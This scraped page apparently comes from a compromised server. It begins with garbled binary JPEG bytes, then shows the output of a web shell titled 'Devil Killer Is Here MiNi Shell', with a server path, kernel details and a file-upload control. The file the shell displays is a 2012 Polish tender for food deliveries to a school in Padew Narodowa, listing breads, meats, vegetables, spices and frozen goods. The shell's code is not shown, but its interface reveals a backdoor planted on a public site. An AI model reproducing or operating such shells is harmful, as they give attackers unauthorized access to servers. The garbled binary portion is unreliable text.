JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120131/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120131/29880-N-2012.html

<p class="kh_header"><b>Padew Narodowa: Dostawa artykułów spożywczych dla Publicznego Gimnazjum 
im. Franciszka Krempy w Padwi Narodowej</b><br>
<b>Numer ogłoszenia: 29880 - 2012; data zamieszczenia: 31.01.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Publiczne Gimnazjum w Padwi Narodowej , Padew Narodowa 222A, 39-340 Padew Narodowa, woj. podkarpackie, tel. 0-15 8119301, faks 0-15 8119948.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> padewgimnazjum.republika.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów spożywczych dla Publicznego Gimnazjum 
im. Franciszka Krempy w Padwi Narodowej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są dostawy artykółów spożywczych dla Publicznego Gimnazjum w Padwi Narodowej:

Zadanie nr 1	Dostawa pieczywa dla Publicznego Gimnazjum Padwi Narodowej
Zadanie nr 2	Dostawa mięsa i wędlin dla Publicznego Gimnazjum w Padwi Narodowej
Zadanie nr 3	Dostawa owoców, warzyw i kiszonek dla Publicznego Gimnazjum 
w Padwi Narodowej
Zadanie nr 4	Dostawa zup, przypraw i dżemów dla Publicznego Gimnazjum 
w Padwi Narodowej
Zadanie nr 5	Dostawa mąki i artykułów mącznych dla Publicznego Gimnazjum 
w Padwi Narodowej
Zadanie nr 6	Dostawa nabiału dla Publicznego Gimnazjum w Padwi Narodowej
Zadanie nr 7	Dostawa mrożonek dla Publicznego Gimnazjum w Padwi Narodowej
Zadanie nr 8	Dostawa słodyczy dla Publicznego Gimnazjum w Padwi Narodowej

Zadanie nr 1
Dostawa pieczywa dla Publicznego Gimnazjum w Padwi Narodowej

Lp.	Nazwa 	Nazwa JM	Ilość
1	2	3	4
1	Chleb duży (0,95 kg)	szt.	1 450
2	Bułki zwykłe (0,08 kg)	szt.	2 600
3	Rogale	szt.	4 950
4	Bułka tarta	kg	380
5	Bułka drożdżowa	szt.	950
6	Pączki	szt.	600
7	Mini pizza	szt.	950


Zadanie nr 2
Dostawa mięsa i wędlin dla Publicznego Gimnazjum w Padwi Narodowej

Lp.	Nazwa 	Nazwa JM	Ilość
1	2	3	4
1	Kiełbasa zwyczajna 	kg	240
2	Wędzonka	kg	240
3	Kości karkowe	kg	670
4	Porcja rosołowa - kurczak	kg 	670
5	Schab bez kości	kg	520
6	Pierś z kurczaka	kg	330
7	Karkówka bez kości	kg	790
8	Kiełbasa krakowska sucha	kg	50
9	Pasztet firmowy drobiowy	kg 	32
10	Kiełbasa domowa (wiejska)	kg	80
11	Polędwica sopocka	kg	66
12	Boczek surowy	kg	150
13	Boczek wędzony	kg	150
14	Mięso rosołowe wołowe	kg	150
15	Smalec, op. 250g	kg	420
16	Słonina	kg	100
17	Udko z kurczaka	kg	200
18	Kiełbasa krakowska parzona	kg	60
19	Polędwica miodowa lub równoważna	kg	40
20	Kiełbasa krakowska drobiowa	kg	60
21	Szynka pieczona bez kości	kg	60
22	Pasztet drwala lub równoważny	kg	60


Zadanie nr 3
Dostawa owoców, warzywa i kiszonek dla Stołówki Szkolnej w Padwi Narodowej

Lp.	Nazwa 	Nazwa JM	Ilość
1	2	3	4
1	Marchew czerwona korzeń	kg	360
2	Pietruszka korzeń	kg	270
3	Seler korzeń	kg	280
4	Por	szt	225
5	Cebula	kg	570
6	Burak ćwikłowy	kg	240
7	Kapusta biała główki 	szt	110
8	Kapusta pekińska 	szt	110
9	Barszcz kiszony 0,5 l	szt	210
10	Ogórek świeży 	kg	120
11	Papryka świeża	kg	35
12	Ogórki kiszone 0,9 l	szt.	115
13	Kapusta kiszona,10 kg wiadro	szt.	50
14	Koperek, pęczek	szt.	40
15	Pieczarki	kg	70
16	Czosnek	kg	11
17	Fasola Jasiek	kg	70
18	Jabłka mix	kg	550
19	Groch żółty, łuskany	kg	36
20	Ogórki korniszony, 1,7 l	szt	90
21	Pomidor świeży	kg	12
22	Sałata zielona, główka	szt	75
23	Sałatka warzywna 0,9 l	szt	75
24	Pietruszka zielona, pęczek	szt	50
25	Szczypiorek, pęczek	szt.	60
26	Rzodkiewka, pęczek	szt.	30
27	Mandarynki	kg	400
28	Grzyby suszone mix	kg	3
29	Borowik suszony cały	kg	2
30	Ogórki kwaszone tarte, op. 400 g	szt	100
31	Sałata obiadowa, op. 0,9 l	szt	60
32	Cytryny	kg	30
33	Truskawki świeże	kg	90


Zadanie nr 4
Dostawa zup, przypraw i dżemów dla Publicznego Gimnazjum w Padwi Narodowej

Lp.	Nazwa	Nazwa JM	Ilość	uwagi
1	2	3	4	5
1	Koper suszony, opakowanie 300g	szt	5	
2	Pietruszka suszona, opakowanie 300g	szt	6	
3	Papryka mielona słodka, op. 1000g	szt	3	
4	Musztarda 1000g lub 1l	szt	10	
5	Majonez dekoracyjny, op. 3000g lub 3 l	szt	25	Winiary lub równoważne
6	Kwasek cytrynowy, op. 50g	szt	10	
7	Majeranek, op. 150 g	szt	7	
8	Ziele angielskie, op. 1000 g	szt	10	
9	Przyprawa magii 1l	szt	20	
10	Koncentrat pomidorowy 0,9l	 	szt	61	Pudliszki lub równoważne
11	Ketchup, op.1 l	szt.	10	
12	Liść laurowy, op. 100g	szt	10	
13	Kminek, op. 1000 g 	szt	10	
14	Jarzynka, op. 2800g	szt	20	Winiary lub równoważne
15	Rosół drobiowy, op. 2200g	szt	10	
16	Sos pieczeniowy, op. 1000g	szt	11	
17	Sos grzybowy, op. 700g	szt	10	
18	Sos boloński, op. 1000g	szt	8	
19	Zupa krupnik, op. 1000 g	szt	3	
20	Zupa grochowa, op. 1000g	szt	10	
21	Zupa grzybowa, op. 1000g		szt	8	
22	Barszcz biały, op. 1000g	szt	42	
23	Żur w proszku, op. 900g	szt	42	
24	Czosnek w proszku, op.1000g	szt.	3	
25	Olej, op. 1 l 	szt	206	Kujawski lub równoważny
26	Olej, op. 3 l	szt.	24	
27	Olej, op. 5 l	szt	38	
28	Cukier kryształ, op. 1kg	kg	1 330	
29	Herbata ekspresowa, op. (100saszetek)	op	400	Tylos, Lipton, Irving lub równoważne
30	Przyprawa do mięs, op. 1100 g	szt	11	
31	Sól, op. 1 kg	kg	200	
32	Chrzan tarty w słoiku 180g	szt.	84	
33	Ocet ?  l	szt	30	
34	Pieprz czarny mielony, op. 1000g	szt	20	
35	Gałka muszkatołowa, op. 1000g	szt	2	
36	Imbir w proszku, op. 1000g	szt	2	
37	Tymianek suszony, op. 300 g	szt	3	
38	Bazylia suszona, op. 200 g 	szt	4	
39	Dżem wieloowocowy, op. 300g	szt	117	
40	Dżem truskawkowy, op. 300g	szt	117	
41	Krem czekoladowy Nutella, op. 780g	szt	19	
42	Sekret szefa drobiowy, op. 800 g 	szt	10	
43	Sekret szefa wołowy, op. 900g 	szt	10	
44	Suszone pomidory z bazylią i czosnkiem, op.450 g	szt	5	
45	Koncentrat pomidorowy, op. 400g	szt	30	Bażant lub równoważne
46	Pomidory w puszce całe, op. 5 l	szt	40	
47	Rosół wołowy 2200 g	szt. 	10	Winiary lub równoważne
48	Rosół warzywny 2200 g	szt. 	10	


Zadanie nr 5
Dostawa mąki i artykułów mącznych dla Publicznego Gimnazjum w Padwi Narodowej

Lp.	Nazwa	Nazwa JM	Ilość	uwagi
1	2	3	4	5
1	Kasza manna, op. 500 g	kg	    60	
2	Kasza jęczmienna, op.1000 g	kg	  132	
3	Ryż biały długi, op. 1000 g	kg	   60	Piątnica lub równoważny
4	Ryż biały, op. 1 kg 	kg	60	Sanko lub równoważny
5	Makaron spagetti, op. 500g	kg	150	Lubella lub równoważne
6	Makaron świderki, op. 500g	kg	360	
7	Makaron nitka, op. 250g	szt.	   440	Czanecki lub równoważne
8	Makaron muszelka mała, op. 250 g	szt.	80	
9	Makaron ryżyk, op. 250 g	szt.	80	
10	Mąka pszenna, op. 1000g	szt. 	158	
11	Mąka ziemniaczana, op. 1000 g	szt.	13	



Zadanie nr 6
Dostawa nabiału dla Publicznego Gimnazjum w Padwi Narodowej

Lp.	Nazwa	Nazwa JM	Ilość	uwagi
1	2	3	4	5
1	Śmietana 18%, op. 400g	szt.	914	
2	Masło, op. 200g	szt.	2 260	
3	Ser biały półtłusty	kg	100	
4	Jajka	szt.	6 630	
5	Ser żółty - salami	kg	20	
6	Ser żółty - edamski 	kg	60	


Zadanie nr 7
Dostawa mrożonek dla Publicznego Gimnazjum w Padwi Narodowej

Lp.	Nazwa	Nazwa JM	Ilość	uwagi
1	2	3	4	5
1	Paluszki rybne	kg	   200	
2	Pierogi ruskie, op. 2500 g	szt	400	SWISS-POL lub równoważne
3	Pierogi ruskie, op. 450 g	szt	2 500	
4	Kalafior mrożony, op. 500g	szt	60	
5	Mieszanka wielowarzywna siedmioskładnikowa, op. 2500g	szt	21	
6	Brukselka, op. 2000g	szt	11	
7	Fasolka szparagowa żółta, op. 2500 g	szt.	9	
8	Fasolka szparagowa zielona, op. 2500g	szt	16	
9	Brokuły mrożone, op. 2500 g	szt	22	
10	Filet z ryby sola SHP	kg	350	
11	Filet z dorsza SHP	kg	100	
12	Filet z ryby tilapia SHP	kg	250	
SHP - filet z minimalną glazurą


Zadanie nr 8
Dostawa słodyczy dla Publicznego Gimnazjum w Padwi Narodowej

Lp.	Nazwa	Nazwa JM	Ilość	 uwagi
1	2	3	4	5
1	Czekolada z orzechami, op. 100 g	szt. 	500	Alpen Gold lub równoważne
2	Czekolada mleczna, op. 100 g	szt	500	
3	Czekolada z orzechami, op. 200 g	szt	500	
4	Czekolada mleczna, op. 200 g	szt	500	
5	Czekolada z bakaliami, op. 200 g	szt	500	
6	Cukierki czekoladowe 	kg	5	Michaszki lub równoważne
7	Cukierki galaretka w czekoladzie	kg	5	Wedel lub równoważne
8	Cukierki mieszanka w czekoladzie	kg	20	Wedel lub równoważne.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamówienie uzupełniające może stanowi nie więcej niż 20% wartości zamówienia podstawowego i polega na powtórzeniu tego samego rodzaju zamówienia (rozszerzenie dostaw) jakie zostało udzielone w trybie przetargu nieograniczonego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.81.10.00-6, 15.11.00.00-2, 15.13.11.30-5, 15.22.00.00-6, 03.20.00.00-3, 15.84.00.00-8, 15.87.00.00-7, 15.87.20.00-1, 15.83.12.00-4, 15.86.41.00-3, 15.89.10.00-0, 15.41.12.00-4, 03.21.13.00-6, 15.61.00.00-7, 15.61.21.00-2, 15.85.11.00-9, 03.14.25.00-3, 15.51.00.00-0, 15.53.00.00-2, 03.22.20.00-3, 15.54.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.02.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> padewnarodowa.biuletyn.net  lub padewgimnazjum.republika.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Publiczne Gimnazjum im. Franciszka Krempy 
w Padwi Narodowej - sekretariat

Urzędzie Gminy Padew Narodowa, ul. Grunwaldzka 2, 39-340 Padew Narodowa, pokój nr 5 - sekretariat.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.02.2012 godzina 09:45, miejsce: Publiczne Gimnazjum im. Franciszka Krempy w Padwi Narodowej
ul. Szkolna 1
39-340 Padew Narodowa
Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa pieczywa dla Publicznego Gimnazjum w Padwi Narodowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa 	Nazwa JM	Ilość
1	2	3	4
1	Chleb duży (0,95 kg)	szt.	1 450
2	Bułki zwykłe (0,08 kg)	szt.	2 600
3	Rogale	szt.	4 950
4	Bułka tarta	kg	380
5	Bułka drożdżowa	szt.	950
6	Pączki	szt.	600
7	Mini pizza	szt.	950.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.10.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.02.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa mięsa i wędlin dla Publicznego Gimnazjum w Padwi Narodowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa 	Nazwa JM	Ilość
1	2	3	4
1	Kiełbasa zwyczajna 	kg	240
2	Wędzonka	kg	240
3	Kości karkowe	kg	670
4	Porcja rosołowa - kurczak	kg 	670
5	Schab bez kości	kg	520
6	Pierś z kurczaka	kg	330
7	Karkówka bez kości	kg	790
8	Kiełbasa krakowska sucha	kg	50
9	Pasztet firmowy drobiowy	kg 	32
10	Kiełbasa domowa (wiejska)	kg	80
11	Polędwica sopocka	kg	66
12	Boczek surowy	kg	150
13	Boczek wędzony	kg	150
14	Mięso rosołowe wołowe	kg	150
15	Smalec, op. 250g	kg	420
16	Słonina	kg	100
17	Udko z kurczaka	kg	200
18	Kiełbasa krakowska parzona	kg	60
19	Polędwica miodowa lub równoważna	kg	40
20	Kiełbasa krakowska drobiowa	kg	60
21	Szynka pieczona bez kości	kg	60
22	Pasztet drwala lub równoważny	kg	60.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.00.00-2, 15.13.11.30-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.02.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa owoców, warzywa i kiszonek dla Publicznego Gimnazjum w Padwi Narodowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa 	Nazwa JM	Ilość
1	2	3	4
1	Marchew czerwona korzeń	kg	360
2	Pietruszka korzeń	kg	270
3	Seler korzeń	kg	280
4	Por	szt	225
5	Cebula	kg	570
6	Burak ćwikłowy	kg	240
7	Kapusta biała główki 	szt	110
8	Kapusta pekińska 	szt	110
9	Barszcz kiszony 0,5 l	szt	210
10	Ogórek świeży 	kg	120
11	Papryka świeża	kg	35
12	Ogórki kiszone 0,9 l	szt.	115
13	Kapusta kiszona,10 kg wiadro	szt.	50
14	Koperek, pęczek	szt.	40
15	Pieczarki	kg	70
16	Czosnek	kg	11
17	Fasola (Jasiek)	kg	70
18	Jabłka mix	kg	550
19	Groch żółty, łuskany	kg	36
20	Ogórki korniszony, 1,7 l	szt	90
21	Pomidor świeży	kg	12
22	Sałata zielona, główka	szt	75
23	Sałatka warzywna 0,9 l	szt	75
24	Pietruszka zielona, pęczek	szt	50
25	Szczypiorek, pęczek	szt.	60
26	Rzodkiewka, pęczek	szt.	30
27	Mandarynki	kg	400
28	Grzyby suszone mix	kg	3
29	Borowik suszony cały	kg	2
30	Ogórki kwaszone tarte, op. 400 g	szt	100
31	Sałata obiadowa, op. 0,9 l	szt	60
32	Cytryny	kg	30
33	Truskawki świeże	kg	90.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.20.00.00-3, 03.22.20.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.02.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawa zup, przypraw i dżemów dla Publicznego Gimnazjum w Padwi Narodowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa	Nazwa JM	Ilość	uwagi
1	2	3	4	5
1	Koper suszony, opakowanie 300g	szt.	5	
2	Pietruszka suszona, opakowanie 300g	szt	6	
3	Papryka mielona słodka, op. 1000g	szt	3	
4	Musztarda 1000g lub 1l	szt	10	
5	Majonez  dekoracyjny, op. 3000g lub 3 l	szt	25	Winiary lub równoważne
6	Kwasek cytrynowy, op. 50g	szt	10	
7	Majeranek, op. 150 g	szt	7	
8	Ziele angielskie, op. 1000 g	szt	10	
9	Przyprawa magii 1l	szt	20	
10	Koncentrat pomidorowy 0,9l	 	szt	61	Pudliszki lub równoważne
11	Ketchup, op.1 l	szt.	10	
12	Liść laurowy, op. 100g	szt	10	
13	Kminek, op. 1000 g 	szt	10	
14	Jarzynka, op. 2800g	szt	20	Winiary lub równoważne
15	Rosół drobiowy, op. 2200g	szt	10	
16	Sos pieczeniowy, op. 1000g	szt	11	
17	Sos grzybowy, op. 700g	szt	10	
18	Sos boloński, op. 1000g	szt	8	
19	Zupa krupnik, op. 1000 g	szt	3	
20	Zupa grochowa, op. 1000g	szt	10	
21	Zupa grzybowa, op. 1000g		szt	8	
22	Barszcz biały, op. 1000g	szt	42	
23	Żur w proszku, op. 900g	szt	42	
24	Czosnek w proszku, op.1000g	szt.	3	
25	Olej, op. 1 l 	szt	206	Kujawski lub równoważny
26	Olej, op. 3 l	szt.	24	
27	Olej, op. 5 l	szt	38	
28	Cukier kryształ, op. 1kg	kg	1 330	
29	Herbata ekspresowa, op. /100 saszetek/	szt.	400	Tylos, Lipton, Irving lub równoważne
30	Przyprawa do mięs, op. 1100 g	szt	11	
31	Sól, op. 1 kg	kg	200	
32	Chrzan tarty w słoiku 180g	szt.	84	
33	Ocet ?  l	szt	30	
34	Pieprz czarny mielony, op. 1000g	szt	20	
35	Gałka muszkatołowa, op. 1000g	szt	2	
36	Imbir w proszku , op. 1000g	szt	2	
37	Tymianek suszony, op. 300 g	szt	3	
38	Bazylia suszona, op. 200 g 	szt	4	
39	Dżem wieloowocowy, op. 300g	szt	117	
40	Dżem truskawkowy, op. 300g	szt	117	
41	Krem czekoladowy Nutella, op. 780g	szt	19	
42	Sekret szefa drobiowy, op. 800 g 	szt	10	
43	Sekret szefa wołowy, op. 900g 	szt	10	
44	Suszone pomidory z bazylią i czosnkiem, op.450 g	szt	5	
45	Koncentrat pomidorowy, op. 400g	szt	30	Bażant lub równoważne
